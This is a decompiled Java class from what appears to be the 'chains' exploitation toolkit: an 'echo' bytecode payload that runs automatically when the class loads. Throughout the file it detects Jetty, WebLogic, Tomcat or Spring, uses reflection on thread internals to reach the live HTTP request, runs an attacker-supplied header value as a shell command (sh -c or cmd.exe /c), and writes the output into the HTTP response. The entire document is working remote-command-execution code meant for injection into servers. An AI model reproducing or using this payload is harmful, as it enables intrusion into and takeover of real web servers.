package com.ar3h.chains.gadget.impl.bytecode.echo.template;

import cn.hutool.core.util.CharsetUtil;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.PrintWriter;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.List;
import org.apache.velocity.servlet.VelocityServlet;
import org.apache.xalan.xsltc.compiler.Constants;

/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/bytecode/echo/template/OneForAllEchoBytecode.class */
public class OneForAllEchoBytecode {
    public static boolean debug;
    public static boolean once;
    public static String header;

    public static void run() {
        if (isJetty()) {
            doJetty();
            if (once) {
                return;
            }
        }
        if (isWeblogic()) {
            doWeblogic();
            if (once) {
                return;
            }
        }
        if (isTomcat()) {
            doTomcat();
            if (once) {
                return;
            }
        }
        if (isSpring()) {
            doSpring();
        }
    }

    public static boolean isSpring() {
        try {
            Class.forName("org.springframework.web.context.request.RequestAttributes");
            if (!debug) {
                return true;
            }
            System.out.println("[one-for-all-echo] [init] target is spring");
            return true;
        } catch (Exception e) {
            return false;
        }
    }

    public static boolean isWeblogic() {
        try {
            Class.forName("weblogic.servlet.internal.ServletRequestImpl");
            if (!debug) {
                return true;
            }
            System.out.println("[one-for-all-echo] [init] target is weblogic");
            return true;
        } catch (Exception e) {
            return false;
        }
    }

    public static boolean isTomcat() {
        try {
            Class.forName("org.apache.catalina.startup.Bootstrap");
            if (!debug) {
                return true;
            }
            System.out.println("[one-for-all-echo] [init] target is tomcat");
            return true;
        } catch (Exception e) {
            return false;
        }
    }

    public static boolean isJetty() {
        try {
            Class.forName("org.eclipse.jetty.servlet.ServletContextHandler");
            if (!debug) {
                return true;
            }
            System.out.println("[one-for-all-echo] [init] target is jetty");
            return true;
        } catch (Exception e) {
            return false;
        }
    }

    public static void doTomcat() {
        Field declaredField;
        Field declaredField2;
        try {
            boolean z = false;
            ThreadGroup threadGroup = Thread.currentThread().getThreadGroup();
            ClassLoader contextClassLoader = Thread.currentThread().getContextClassLoader();
            Field declaredField3 = threadGroup.getClass().getDeclaredField("threads");
            declaredField3.setAccessible(true);
            for (Thread thread : (Thread[]) declaredField3.get(threadGroup)) {
                if (thread != null) {
                    try {
                        String name = thread.getName();
                        if (debug) {
                            System.out.println("[one-for-all-echo] [tomcat] thread name -> " + name);
                        }
                        if (!name.contains("exec") && name.contains("http")) {
                            Field declaredField4 = thread.getClass().getDeclaredField("target");
                            declaredField4.setAccessible(true);
                            Object obj = declaredField4.get(thread);
                            if (obj instanceof Runnable) {
                                Field declaredField5 = obj.getClass().getDeclaredField("this$0");
                                declaredField5.setAccessible(true);
                                Object obj2 = declaredField5.get(obj);
                                try {
                                    declaredField = obj2.getClass().getDeclaredField(Constants.TRANSLET_OUTPUT_PNAME);
                                } catch (NoSuchFieldException e) {
                                    declaredField = obj2.getClass().getSuperclass().getSuperclass().getDeclaredField(Constants.TRANSLET_OUTPUT_PNAME);
                                }
                                declaredField.setAccessible(true);
                                Object obj3 = declaredField.get(obj2);
                                try {
                                    declaredField2 = obj3.getClass().getSuperclass().getDeclaredField("global");
                                } catch (NoSuchFieldException e2) {
                                    declaredField2 = obj3.getClass().getDeclaredField("global");
                                }
                                declaredField2.setAccessible(true);
                                Object obj4 = declaredField2.get(obj3);
                                Field declaredField6 = obj4.getClass().getDeclaredField("processors");
                                declaredField6.setAccessible(true);
                                for (Object obj5 : (List) declaredField6.get(obj4)) {
                                    Field declaredField7 = obj5.getClass().getDeclaredField(VelocityServlet.REQUEST);
                                    declaredField7.setAccessible(true);
                                    Object obj6 = declaredField7.get(obj5);
                                    Object invoke = obj6.getClass().getMethod("getResponse", new Class[0]).invoke(obj6, new Object[0]);
                                    String str = (String) obj6.getClass().getMethod("getHeader", String.class).invoke(obj6, header);
                                    if (str != null && !str.isEmpty()) {
                                        invoke.getClass().getMethod("setStatus", Integer.TYPE).invoke(invoke, 200);
                                        String exec = exec(str);
                                        try {
                                            Class<?> cls = Class.forName("org.apache.tomcat.util.buf.ByteChunk", false, contextClassLoader);
                                            Object newInstance = cls.newInstance();
                                            cls.getDeclaredMethod("setBytes", byte[].class, Integer.TYPE, Integer.TYPE).invoke(newInstance, exec.getBytes(), 0, Integer.valueOf(exec.getBytes().length));
                                            invoke.getClass().getMethod("doWrite", cls).invoke(invoke, newInstance);
                                        } catch (NoSuchMethodException e3) {
                                            Class<?> cls2 = Class.forName("java.nio.ByteBuffer", false, contextClassLoader);
                                            invoke.getClass().getMethod("doWrite", cls2).invoke(invoke, cls2.getDeclaredMethod("wrap", byte[].class).invoke(cls2, exec.getBytes()));
                                        }
                                        z = true;
                                    }
                                    if (z) {
                                        break;
                                    }
                                }
                                if (z) {
                                    break;
                                }
                            }
                        }
                    } catch (Exception e4) {
                    }
                }
            }
        } catch (Exception e5) {
        }
    }

    public static void doWeblogic() {
        try {
            Object methodAndInvoke = getMethodAndInvoke(Thread.currentThread(), "getCurrentWork", new Class[0], new Object[0]);
            if (methodAndInvoke == null) {
                if (debug) {
                    System.out.println("[one-for-all-echo] [weblogic] unknown error");
                    return;
                }
                return;
            }
            Object methodAndInvoke2 = getMethodAndInvoke(methodAndInvoke.getClass().getName().endsWith("ServletRequestImpl") ? methodAndInvoke : getMethodAndInvoke(getFieldValue(methodAndInvoke, "connectionHandler"), "getServletRequest", new Class[0], new Object[0]), "getHeader", new Class[]{String.class}, new Object[]{header});
            if (methodAndInvoke2 == null) {
                if (debug) {
                    System.out.println("[one-for-all-echo] [weblogic] echo header is null");
                    return;
                }
                return;
            }
            String obj = methodAndInvoke2.toString();
            if (obj != null && !obj.isEmpty()) {
                String exec = exec(obj);
                if (debug) {
                    System.out.println("[one-for-all-echo] [weblogic] echo result -> " + exec);
                }
                Object methodAndInvoke3 = getMethodAndInvoke(methodAndInvoke, "getResponse", new Class[0], new Object[0]);
                Object methodAndInvoke4 = getMethodAndInvoke(methodAndInvoke3, "getServletOutputStream", new Class[0], new Object[0]);
                getMethodAndInvoke(methodAndInvoke4, "writeStream", new Class[]{InputStream.class}, new Object[]{Class.forName("weblogic.xml.util.StringInputStream").getDeclaredConstructor(String.class).newInstance(exec)});
                getMethodAndInvoke(methodAndInvoke4, "flush", new Class[0], new Object[0]);
                getMethodAndInvoke(getMethodAndInvoke(methodAndInvoke3, "getWriter", new Class[0], new Object[0]), "write", new Class[]{String.class}, new Object[]{""});
            }
        } catch (Exception e) {
        }
    }

    public static void doJetty() {
        try {
            Field declaredField = Thread.currentThread().getClass().getDeclaredField("threadLocals");
            declaredField.setAccessible(true);
            Object obj = declaredField.get(Thread.currentThread());
            Field declaredField2 = obj.getClass().getDeclaredField("table");
            declaredField2.setAccessible(true);
            Object[] objArr = (Object[]) declaredField2.get(obj);
            int i = 0;
            while (true) {
                if (i >= objArr.length) {
                    break;
                }
                Object obj2 = objArr[i];
                if (obj2 != null) {
                    try {
                        Field declaredField3 = obj2.getClass().getDeclaredField("value");
                        declaredField3.setAccessible(true);
                        Object obj3 = declaredField3.get(obj2);
                        if (obj3.getClass().getName().endsWith("AsyncHttpConnection")) {
                            Object invoke = obj3.getClass().getMethod("getRequest", null).invoke(obj3, null);
                            String str = (String) invoke.getClass().getMethod("getHeader", String.class).invoke(invoke, header);
                            if (str != null && !str.isEmpty()) {
                                ((PrintWriter) obj3.getClass().getMethod("getPrintWriter", String.class).invoke(obj3, "utf-8")).println(exec(str));
                            }
                        } else if (obj3.getClass().getName().endsWith("HttpConnection")) {
                            Object invoke2 = obj3.getClass().getDeclaredMethod("getHttpChannel", null).invoke(obj3, null);
                            Object invoke3 = invoke2.getClass().getMethod("getRequest", null).invoke(invoke2, null);
                            String str2 = (String) invoke3.getClass().getMethod("getHeader", String.class).invoke(invoke3, header);
                            if (str2 != null && !str2.isEmpty()) {
                                String exec = exec(str2);
                                Object invoke4 = invoke2.getClass().getMethod("getResponse", null).invoke(invoke2, null);
                                PrintWriter printWriter = (PrintWriter) invoke4.getClass().getMethod("getWriter", null).invoke(invoke4, null);
                                printWriter.println(exec);
                                printWriter.flush();
                                printWriter.close();
                            }
                        }
                    } catch (Exception e) {
                    }
                }
                i++;
            }
        } catch (Exception e2) {
        }
    }

    public static void doSpring() {
        try {
            Object invoke = Class.forName("org.springframework.web.context.request.RequestContextHolder").getMethod("getRequestAttributes", new Class[0]).invoke(null, new Object[0]);
            Class<?> cls = Class.forName("org.springframework.web.context.request.ServletRequestAttributes");
            Method method = cls.getMethod("getRequest", new Class[0]);
            Method method2 = cls.getMethod("getResponse", new Class[0]);
            Object invoke2 = method.invoke(invoke, new Object[0]);
            Object invoke3 = method2.invoke(invoke, new Object[0]);
            String str = (String) invoke2.getClass().getMethod("getHeader", String.class).invoke(invoke2, header);
            if (str != null && !str.isEmpty()) {
                PrintWriter printWriter = (PrintWriter) invoke3.getClass().getMethod("getWriter", new Class[0]).invoke(invoke3, new Object[0]);
                printWriter.write(exec(str));
                printWriter.flush();
                printWriter.close();
            }
        } catch (Exception e) {
        }
    }

    public static Method getMethodByClass(Class<?> cls, String str, Class<?>[] clsArr) {
        Method method = null;
        while (cls != null) {
            try {
                method = cls.getDeclaredMethod(str, clsArr);
                method.setAccessible(true);
                cls = null;
            } catch (Exception e) {
                cls = cls.getSuperclass();
            }
        }
        return method;
    }

    public static Object getMethodAndInvoke(Object obj, String str, Class<?>[] clsArr, Object[] objArr) {
        try {
            Method methodByClass = getMethodByClass(obj.getClass(), str, clsArr);
            if (methodByClass != null) {
                return methodByClass.invoke(obj, objArr);
            }
            return null;
        } catch (Exception e) {
            return null;
        }
    }

    public static Object getFieldValue(Object obj, String str) throws Exception {
        Field field = null;
        if (obj instanceof Field) {
            field = (Field) obj;
        } else {
            Class<?> cls = obj.getClass();
            while (cls != null) {
                try {
                    field = cls.getDeclaredField(str);
                    cls = null;
                } catch (Exception e) {
                    cls = cls.getSuperclass();
                }
            }
        }
        if (field == null) {
            return null;
        }
        field.setAccessible(true);
        return field.get(obj);
    }

    private static byte[] readAllBytes(InputStream inputStream) throws IOException {
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        byte[] bArr = new byte[16384];
        while (true) {
            int read = inputStream.read(bArr, 0, bArr.length);
            if (read == -1) {
                byteArrayOutputStream.flush();
                return byteArrayOutputStream.toByteArray();
            }
            byteArrayOutputStream.write(bArr, 0, read);
        }
    }

    public static String exec(String str) {
        try {
            boolean z = true;
            String property = System.getProperty("os.name");
            if (property != null && property.toLowerCase().contains("win")) {
                z = false;
            }
            Process exec = Runtime.getRuntime().exec(z ? new String[]{"sh", "-c", str} : new String[]{"cmd.exe", "/c", str});
            byte[] readAllBytes = readAllBytes(exec.getInputStream());
            if (readAllBytes.length == 0) {
                readAllBytes = readAllBytes(exec.getErrorStream());
            }
            return new String(readAllBytes, CharsetUtil.GBK);
        } catch (Exception e) {
            return e.getMessage();
        }
    }

    static {
        run();
    }
}
